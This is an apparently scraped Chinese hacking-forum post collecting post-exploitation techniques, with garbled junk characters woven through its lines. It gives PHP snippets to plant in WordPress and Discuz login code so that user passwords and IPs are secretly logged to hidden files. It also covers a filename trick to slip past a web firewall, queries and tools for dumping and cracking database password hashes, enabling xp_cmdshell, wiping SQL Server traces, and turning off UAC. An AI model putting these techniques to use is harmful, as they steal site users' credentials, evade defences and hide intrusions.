& G8 z& _" p9 {if($log_user&&$log_pwd&&$log_ip){
- V& f5 T) K3 K6 r9 E@fwrite(fopen(‘pwd.txt’,”a+”),$txt);2 U' ]9 t5 ^& a, V
}
% J/ F: w# H$ z8 ]; R+ N当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。7 f1 `- F( @  _9 a/ A; k
就是搜索case ‘login’
. I* L) ?5 Q+ Q1 {1 |7 h6 A: d& ]在它下面直接插入即可,记录的密码生成在pwd.txt中,7 n: k* X1 B5 G$ o% A
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录3 f9 t' }! I; f- e) t1 g
利用II6文件解析漏洞绕过安全狗代码:  ^3 O+ I) S7 t/ a# o
;antian365.asp;antian365.jpg0 W5 Q* Y# t9 |4 }5 q! x2 i& ^
* @; N+ p6 I% e/ I. a
各种类型数据库抓HASH破解最高权限密码!
* k4 ~1 U% c6 A, @5 g/ M8 j, l$ `1.sql server2000
4 a. ?8 i' g/ G+ u9 L& |SELECT password from master.dbo.sysxlogins where name='sa'
7 z& n7 S2 i8 ]. \0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503410 a  e$ Z8 N% K0 _2 F& }# w
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
; }' O/ f9 q, _' G: [- M/ T# h) ]; k. D! l+ w. i: M% W
0×0100- constant header
1 d" k, l( ]3 ]+ p5 ?. ?/ f34767D5C- salt
/ e; A6 ]( ^# [) {0 f: ?0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash5 @; g* ~; v4 L. A, X  \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
2 N' S( o8 p# @  U0 ycrack the upper case hash in ‘cain and abel’ and then work the case sentive hash) g0 |  j9 s) \2 \
SQL server 2005:-  q& b, T/ h6 N* g# v# v5 V0 K
SELECT password_hash FROM sys.sql_logins where name='sa'
  j2 p  W% t% x- W) Y0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
1 ^  l' ^* B9 A" i$ L0×0100- constant header5 }! x0 e- |9 ]0 r4 x
993BF231-salt4 }, U, O  s, l2 Q2 v$ L
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash' c  E5 Y8 e8 M' a7 C
crack case sensitive hash in cain, try brute force and dictionary based attacks.
8 w% Q2 I. S( U) Z: F! m7 t: {& I
2 u8 o8 L+ T; bupdate:- following bernardo’s comments:-2 |* P( v- ]/ v+ Y
use function fn_varbintohexstr() to cast password in a hex string.
3 U$ e2 J" o  {. `% z" H' {e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
7 @, ]  }' f7 x* C9 I& W- [; {% n# t/ L# L
MYSQL:-
2 J! c+ q/ J6 c6 w" G" @, Z+ l
! _6 E5 s+ X+ _! ~3 \In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
: P5 N5 g" x5 c& I0 |$ c& x4 O- k) ]2 {; o2 C
*mysql  < 4.1) C6 m4 a4 K7 [( f& y2 B- r

' o8 A( P0 e5 S* F  {mysql> SELECT PASSWORD(‘mypass’);! j8 @1 J4 x+ L! l, Y
+——————–+
2 s# k" O3 y  O% q& o: }* r| PASSWORD(‘mypass’) |' x, s. N& O! g1 }, @3 A
+——————–+, J6 E: a* q3 K( K# N% \- ^
| 6f8c114b58f2ce9e   |$ q# ~8 D' k2 b: N+ B
+——————–+' n- Q- u4 M. i5 o) A9 Y

8 e+ V* f' i% r7 O4 ?6 F/ w7 ~. D*mysql >=4.1' `) D- t3 ~# g& w6 K
+ _6 |& z; \0 C8 G2 m) r' [! L
mysql> SELECT PASSWORD(‘mypass’);
2 b, P$ u2 \. `: S+——————————————-+
* S7 S' a* c" A$ Y- A1 H| PASSWORD(‘mypass’)                        |
4 c. }9 l0 Q. \" _& ~- G  w+——————————————-+% ~2 t- |) h9 D6 }
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |. T" |" x, z" g1 `, x
+——————————————-+0 M/ i" L: m4 \# s% z1 _
1 x7 k! z6 Y0 V) x* i
Select user, password from mysql.user
8 R8 T5 F2 Y0 h0 a7 X' vThe hashes can be cracked in ‘cain and abel’& `2 J: B3 _$ ^: e: N

0 s& s, N8 H7 O+ G$ xPostgres:-0 j4 R% P+ x  |
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)2 i( x8 k& E4 O8 W, g- o
select usename, passwd from pg_shadow;
$ o% X/ V, P# C; W4 uusename      |  passwd1 R9 W8 |4 {- n* Z9 F0 b
——————+————————————-2 _. x- N; @8 ]8 l% P4 U0 y" Z. B$ N
testuser            | md5fabb6d7172aadfda4753bf0507ed4396; ^6 {$ y' b0 M: l$ X6 ^
use mdcrack to crack these hashes:-% }4 `) I! L& J& O0 ]: X4 ?
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43960 F+ z* t- }: ^; I- X* ^$ R

7 W  a' u9 [( j9 Y; c( w' IOracle:-: u  w6 D  M/ G
select name, password, spare4 from sys.user$
% p! D3 a3 p. p! P8 v: yhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
9 I; k2 j: ^/ ^( u2 D" E, ?More on Oracle later, i am a bit bored….& q( _$ N: q( I; \* O

# d% C0 }3 L! M& y" [+ N8 m$ i1 \, z
# q, R& `- E7 S' b在sql server2005/2008中开启xp_cmdshell
' l. M' L" O% ^9 @-- To allow advanced options to be changed.
' m9 c) `6 q3 {9 m4 j, s; IEXEC sp_configure 'show advanced options', 17 I! t7 }9 K# S9 V7 ?/ s
GO
) h9 R& r& x: A' y; J-- To update the currently configured value for advanced options.6 p8 s7 E3 [2 V" f3 y
RECONFIGURE' M* P3 v3 |. W  c* T/ |
GO* @' ^2 K# h. O$ B) q
-- To enable the feature.
# F% p  }" _9 ~/ Z+ zEXEC sp_configure 'xp_cmdshell', 1
- S# I4 f/ n! q' }# t- q  E, A3 sGO# F, {2 ^" O5 z6 P  b+ v- B
-- To update the currently configured value for this feature.
' z# n/ e/ A5 D2 G  RRECONFIGURE
, x0 O+ }4 O$ {% \) d+ NGO
& {4 H7 ]! o1 USQL 2008 server日志清除,在清楚前一定要备份。- K4 Z; d/ f3 f3 i
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
5 a- N- f! p& N' `X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
- c8 C9 }& O* M# K' i; z5 s7 L' U* B3 k9 f5 G6 g2 H
对于SQL Server 2008以前的版本:: |1 f2 Y2 Y3 t% ~) E
SQL Server 2005:
) c: q/ O- ]' N删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
; c+ c( ?/ j/ L% M* ySQL Server 2000:
7 C1 x/ B5 g0 g8 _( i) t! ]清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
. Y& t; |& e5 q* T! b
# P& ^% c6 m; s, h+ L本帖最后由 simeon 于 2013-1-3 09:51 编辑
1 S5 q' o) O/ w) _
+ w5 i# |7 G+ c1 }0 z# b0 [( h6 @, Y7 u8 S: F
windows 2008 文件权限修改
/ E) X! h' X' w% F1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
+ d& X; ]7 H1 M+ l3 x, Y2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
% X; W* z1 Y9 Q! p* ^! J4 |  [一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,9 N' Q/ n/ [6 K& {. a2 I
% B4 a+ E1 ^0 t) I6 L' Y$ }2 x9 Z; c
Windows Registry Editor Version 5.002 G/ ]( Y; T6 H6 t- Y) A
[HKEY_CLASSES_ROOT\*\shell\runas]
% M. L5 Z4 b" K@="管理员取得所有权"4 h3 g8 B% ~& h+ y0 c, j+ ^
"NoWorkingDirectory"=""
0 {7 z$ L7 [' ~' Y' W, H[HKEY_CLASSES_ROOT\*\shell\runas\command]
5 G* a) ^6 J$ U3 k8 Q# b) }, `@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 x2 ?1 U( o2 t"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 ~; J# U" e  P! i
[HKEY_CLASSES_ROOT\exefile\shell\runas2]1 O8 |2 l3 r' B) ]9 i! i
@="管理员取得所有权"
5 `8 d3 l7 y+ J2 ?% m! l" _"NoWorkingDirectory"=""
/ K% l, ^( R7 \0 f2 ?[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]8 a; F+ n; w# {3 H0 h( t1 q- X1 y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# B% ?2 ?* l- ~4 v$ A: \
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 y% x: K* S( Y+ U0 |) J
8 a7 C2 x) d. `9 e8 H8 H1 \[HKEY_CLASSES_ROOT\Directory\shell\runas]9 M3 @! E0 n! \% l1 D
@="管理员取得所有权"; Y8 x' g- C* E* C4 o4 Z
"NoWorkingDirectory"=""
' e* n4 G/ M2 k: H2 f[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
5 h4 X( i; u1 c( w, m/ l$ D- x9 D@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* U; j# z! |" ?4 Z3 Y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"6 \+ a$ i  b2 U# L, v, X6 P

6 A, P* I- n% }& Y1 L# U  n( M
1 Y) p% q5 @' B4 h" Z* r+ E' vwin7右键“管理员取得所有权”.reg导入
  G6 Y- v- s/ M4 B) O' F$ L二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,. X0 }0 p, e9 W. S$ p% F; g
1、C:\Windows这个路径的“notepad.exe”不需要替换
$ R' n- b1 t- |6 h. X' l2、C:\Windows\System32这个路径的“notepad.exe”不需要替换. I* p. F3 O' l2 O' b3 K$ q
3、四个“notepad.exe.mui”不要管
: z9 {1 I9 R: I4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
& f; x+ K  n( M" }C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
5 n( a$ \% u% l. y& n替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,9 d( Z% e& g; }3 J
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
2 n' ?$ |% \' X' ]windows 2008中关闭安全策略:
/ ]) g, L' D8 o6 vreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
: k9 M( L# o  l1 M修改uc_client目录下的client.php 在
* L, Y4 d3 o+ |3 zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {& Q7 C" Y* ?+ X$ Z8 L5 j
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% J/ k) J* s0 K8 r+ x, V8 Q" d' i你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
$ H% P1 C9 ^" n5 rif(getenv('HTTP_CLIENT_IP')) {
+ n0 U1 \( C( S' `$onlineip = getenv('HTTP_CLIENT_IP');9 u1 q/ m  f) _2 M
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {" x4 E. _3 X, j
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
% P+ I# N9 l9 V3 }0 N& O/ a} elseif(getenv('REMOTE_ADDR')) {
  G( p$ g% ^! ^4 z) `% L$onlineip = getenv('REMOTE_ADDR');% @, j% }% g8 m% W4 F
} else {8 ^. ~, }' c7 I0 [* n0 y* t
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
4 `: X/ X& _$ x4 v# ?}2 \3 ]1 X! \3 ~% c5 A2 n  O' }
     $showtime=date("Y-m-d H:i:s");
3 ~2 p/ f% P4 U6 Q    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: _' F' X- T8 J- e+ @% g+ t    $handle=fopen('./data/cache/csslog.php','a+');
: x6 S! H0 k- C    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2